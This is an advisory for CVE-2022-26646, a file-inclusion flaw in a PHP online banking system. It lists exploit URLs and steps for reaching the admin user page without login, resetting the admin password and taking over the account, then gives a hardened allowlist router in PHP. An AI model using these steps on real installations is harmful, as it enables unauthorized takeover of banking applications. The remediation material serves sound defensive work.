CVE: CVE-2022-26646
Vendor Homepage: https://www.sourcecodester.com/
Software Link: Online Banking System
Description: The parameters "p" and "page" are used to include files. An unauthenticated user can include and read internal PHP files of the web application, turning the LFI into privilege escalation (admin pages that are only meant to be reachable after login can be loaded directly).
- Impact: unauthenticated (null session) account to admin
- Payload used:
  http://web.com/banking/?p=<any_phpfile>
- Steps:
  1. Go to the home page: http://localhost/banking/?p=about
  2. Load the admin user page through the include parameter: http://localhost/banking/?p=admin/user/index
  3. Change the admin password
  4. Log in as administrator
  5. Access the admin panel
- File read demonstrated on info.php
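The root cause described above is a front controller that turns a request parameter directly into an include path, so the page and parameter names are the only thing separating public pages from admin pages. The following is an added example written for this advisory, not code from the Online Banking System project: it assumes a hypothetical dispatcher keyed on `p`/`page` and shows the weak pattern next to an allowlist-based router that also enforces the admin check before the include happens. File names, the `PUBLIC_PAGES`/`ADMIN_PAGES` maps and the `admin_id` session flag are assumptions.

```php
<?php
// Added example; not the project's own code. Assumes a front controller that
// maps a "p"/"page" query parameter to a PHP file under the web root.

// Weak pattern (hypothetical): the request parameter becomes part of an include
// path, so any readable .php file, including admin pages, can be pulled in
// without any authentication check.
function render_page_unsafe(string $p): void
{
    include __DIR__ . '/' . $p . '.php';   // do not use
}

// Hardened pattern: the parameter is a key into a fixed allowlist, never a path.
const PUBLIC_PAGES = [
    'home'  => 'pages/home.php',
    'about' => 'pages/about.php',
    'login' => 'pages/login.php',
];

// Admin pages are a separate map and are only consulted for an admin session.
const ADMIN_PAGES = [
    'admin/user/index' => 'admin/user/index.php',
];

function resolve_page(string $requested, bool $is_admin): ?string
{
    // Exact-key lookup: anything not in the maps resolves to nothing.
    if (array_key_exists($requested, PUBLIC_PAGES)) {
        $relative = PUBLIC_PAGES[$requested];
    } elseif ($is_admin && array_key_exists($requested, ADMIN_PAGES)) {
        $relative = ADMIN_PAGES[$requested];
    } else {
        return null;
    }

    // Defence in depth: confirm the resolved file really lives under the web
    // root, so a careless later edit of the allowlist cannot escape it.
    $root = realpath(__DIR__);
    $path = realpath(__DIR__ . '/' . $relative);
    if ($path === false
        || strncmp($path, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    return $path;
}

function render_page(string $requested, bool $is_admin): void
{
    $path = resolve_page($requested, $is_admin);
    if ($path === null) {
        http_response_code(404);
        echo 'Page not found';
        return;
    }
    include $path;
}

// Dispatch: both parameter names go through the same check.
session_start();
$requested = $_GET['p'] ?? $_GET['page'] ?? 'home';
$is_admin  = !empty($_SESSION['admin_id']);   // assumed session flag
render_page((string) $requested, $is_admin);
```

The router-level check is a second line of defence, not a replacement for authorization inside each admin script: every file under `admin/` should still verify the session itself, so that a future direct route to it does not reintroduce the same unauthenticated access.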